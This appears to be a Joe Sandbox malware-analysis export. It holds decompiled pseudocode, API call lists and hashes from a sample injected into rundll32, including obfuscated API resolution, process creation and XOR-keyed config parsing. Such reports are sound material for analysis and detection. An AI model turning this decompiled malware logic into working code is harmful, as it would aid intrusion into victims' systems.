                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 985512f45237af23ad4b0547f84bdaeba48f43a11b10813737cc49532b3b1d16
                                          • Instruction ID: 4a471eabb4366d83338d81d1c887945640f6b6d0a7645ed6d60d439e5fd26072
                                          • Opcode Fuzzy Hash: 985512f45237af23ad4b0547f84bdaeba48f43a11b10813737cc49532b3b1d16
                                          • Instruction Fuzzy Hash: AD61B179500201AFE715EBA8EC48F667BF9EF48708F064614FA0AD7290D738ED85DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E04C0ADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x4c00000;
                                          				_t115 = _t139[3] + 0x4c00000;
                                          				_t131 = _t139[4] + 0x4c00000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x4c00000;
                                          				_v16 = _t139[5] + 0x4c00000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x4c00002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x4c0d1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x4c0d1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x4c0d1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x4c0d19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x4c0d1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x4c0d198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x4c0d198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x4c0d19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04C0AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 04C0AE9B
                                          • GetLastError.KERNEL32 ref: 04C0AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04C0AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: a99387da01df2df7f9b90e7fe736f1571de9d455e215deebb9fb5c201f212eaf
                                          • Instruction ID: 871665706ff39d57a4b411790a7d39b6b080ba919042d996c03f5cb0be814f08
                                          • Opcode Fuzzy Hash: a99387da01df2df7f9b90e7fe736f1571de9d455e215deebb9fb5c201f212eaf
                                          • Instruction Fuzzy Hash: 7F815DB5A00305AFDB14CF99D880BAEB7F6FF58314F158129EA05E7280EB75EA45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E04C030FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x4c0d33c; // 0x5589bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E04C09810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x4c0c19c;
                                          				}
                                          				_t44 = E04C047E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E04C058BE(lstrlenW(0x4c0eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4c0eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t73 =  *0x4c0d11c; // 0x4c0abc9
                                          						_t18 = _t75 + 0x4c0eb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E04C058BE(lstrlenW(0x4c0ec58) + _a8 + _t57 + _t58 + lstrlenW(0x4c0ec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E04C0147E(_v16);
                                          						} else {
                                          							_t64 =  *0x4c0d2a4; // 0x97a5a8
                                          							_t31 = _t64 + 0x4c0ec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E04C0147E(_v8);
                                          				}
                                          				return _v20;
                                          			}


                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04C03111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 04C0314C
                                          • lstrlen.KERNEL32(?), ref: 04C03155
                                          • lstrlen.KERNEL32(00000000), ref: 04C0315C
                                          • lstrlenW.KERNEL32(80000002), ref: 04C0316A
                                          • lstrlenW.KERNEL32(04C0EB38), ref: 04C03173
                                          • lstrlen.KERNEL32(?), ref: 04C031B7
                                          • lstrlen.KERNEL32(?), ref: 04C031BF
                                          • lstrlenW.KERNEL32(?), ref: 04C031CA
                                          • lstrlenW.KERNEL32(04C0EC58), ref: 04C031D3
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: e992a0425b3ee3bf6a520c20cc42309ca5f6813ab6445f8e3cb61ed448a0766a
                                          • Instruction ID: 9b2916a66c43af7c6f9edcd68b373df22585e38b0e6a7f3cf5627f965ec4b6da
                                          • Opcode Fuzzy Hash: e992a0425b3ee3bf6a520c20cc42309ca5f6813ab6445f8e3cb61ed448a0766a
                                          • Instruction Fuzzy Hash: AB316B76D00109FFDF11AFA4CC4499EBFBAEF48308B068461E904A7261DB35EA51DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E04C01493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E04C057D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x4c0d260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t18 = _t46 + 0x4c0e3e6; // 0x73797325
                                          					_t66 = E04C077E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t19 = _t49 + 0x4c0e747; // 0x5588cef
                                          						_t20 = _t49 + 0x4c0e0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E04C0684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E04C0684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x4c0d238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E04C0147E(_t68);
                                          				goto L12;
                                          			}


                                          APIs
                                            • Part of subcall function 04C057D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C014AF,?,?,?,?,00000000,00000000), ref: 04C057FD
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C0581F
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C05835
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C0584B
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C05861
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C05877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04C014C5
                                          • memset.NTDLL ref: 04C01500
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04C0333A,73797325), ref: 04C077F7
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04C07811
                                          • GetModuleHandleA.KERNEL32(4E52454B,05588CEF,73797325), ref: 04C01536
                                          • GetProcAddress.KERNEL32(00000000), ref: 04C0153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C015A5
                                            • Part of subcall function 04C0684E: GetProcAddress.KERNEL32(36776F57,04C0935F), ref: 04C06869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04C01582
                                          • CloseHandle.KERNEL32(?), ref: 04C01587
                                          • GetLastError.KERNEL32(00000001), ref: 04C0158B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: ec68a8476f536ebfc89e50e3516107082cc076dc2dc8239ab5a0bef5667a15fd
                                          • Instruction ID: 9a573e5d912979ab61e946595618d6754651dabdfb3d0931f5728188664d1884
                                          • Opcode Fuzzy Hash: ec68a8476f536ebfc89e50e3516107082cc076dc2dc8239ab5a0bef5667a15fd
                                          • Instruction Fuzzy Hash: 053130B6900208AFEB21AFE4DC88E9EBBBDEF08344F058565E606A7151D735AE44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E04C04D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t1 = _t9 + 0x4c0e62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E04C06027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E04C058BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E04C06F33(_t34, _t41, _a8);
                                          						E04C0147E(_t41);
                                          						_t42 = E04C04759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E04C0147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E04C04858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E04C0147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E04C0147E(_t28);
                                          				}
                                          				return _t36;
                                          			}


                                          APIs
                                            • Part of subcall function 04C06027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04C04D46,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?), ref: 04C0608E
                                            • Part of subcall function 04C06027: sprintf.NTDLL ref: 04C060AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?,055895B0), ref: 04C04D57
                                          • lstrlen.KERNEL32(?,?,?,04C052FE,?,055895B0), ref: 04C04D5F
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • strcpy.NTDLL ref: 04C04D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04C04D81
                                            • Part of subcall function 04C06F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04C04D90,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C06F4A
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C04D9E
                                            • Part of subcall function 04C04759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04C04DAA,00000000,?,?,04C052FE,?,055895B0), ref: 04C04763
                                            • Part of subcall function 04C04759: _snprintf.NTDLL ref: 04C047C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 0d79acf6eff87e1f7b4b1a167bae5d0494dd79593c3dde3b5cb18a70ec55db35
                                          • Instruction ID: 70aa244ce3aa31f12c639149f1583cf0d889c557edc11350a33ab6c56c0be540
                                          • Opcode Fuzzy Hash: 0d79acf6eff87e1f7b4b1a167bae5d0494dd79593c3dde3b5cb18a70ec55db35
                                          • Instruction Fuzzy Hash: 9A112977A012257757267BF89C84C6F7AAFCE457683068255FB04AB180CE34FE01ABE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E04C098F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x4c0d2a0; // 0x59935a40
                                          				if(E04C096D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x4c0d2d0 = _v12;
                                          				}
                                          				_t23 =  *0x4c0d2a0; // 0x59935a40
                                          				if(E04C096D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x4c0d2a0; // 0x59935a40
                                          						_t29 = E04C010CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x4c0d240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x4c0d2a0; // 0x59935a40
                                          						_t30 = E04C010CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x4c0d244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x4c0d2a0; // 0x59935a40
                                          						_t31 = E04C010CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x4c0d248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x4c0d2a0; // 0x59935a40
                                          						_t32 = E04C010CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x4c0d004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x4c0d2a0; // 0x59935a40
                                          						_t33 = E04C010CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x4c0d02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x4c0d2a0; // 0x59935a40
                                          						_t34 = E04C010CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E04C0A2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E04C09B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x4c0d2a0; // 0x59935a40
                                          						_t35 = E04C010CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E04C0A2EF(0, _t35) != 0) {
                                          						_t86 =  *0x4c0d324; // 0x55895b0
                                          						E04C04C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x4c0d238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}






























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C0997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C099AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C099DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C09A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C09A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C09AC3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 372a38bedbf7dad8b2cc9b00e7f231bc025c5796e406316d123f845ac0f80646
                                          • Instruction ID: d443b43c0d22b61201c2a5ec07efddca335a04f063161ecae660106ae322eabe
                                          • Opcode Fuzzy Hash: 372a38bedbf7dad8b2cc9b00e7f231bc025c5796e406316d123f845ac0f80646
                                          • Instruction Fuzzy Hash: 8651A7B4B00104EFD710EBB9DD84F6B72EFE788704B698925A506D3185EA35FE40D720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 04C013B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04C013C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 04C013DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C01443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C01452
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C0145D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 4c5555779accdf4c2e574dfaffda8452e7de40f28729263e6d16de95050de155
                                          • Instruction ID: 95d0b769dbfc6a9c9b123c1f95e04348bb2553d63ef475dbed7b8b472bda7659
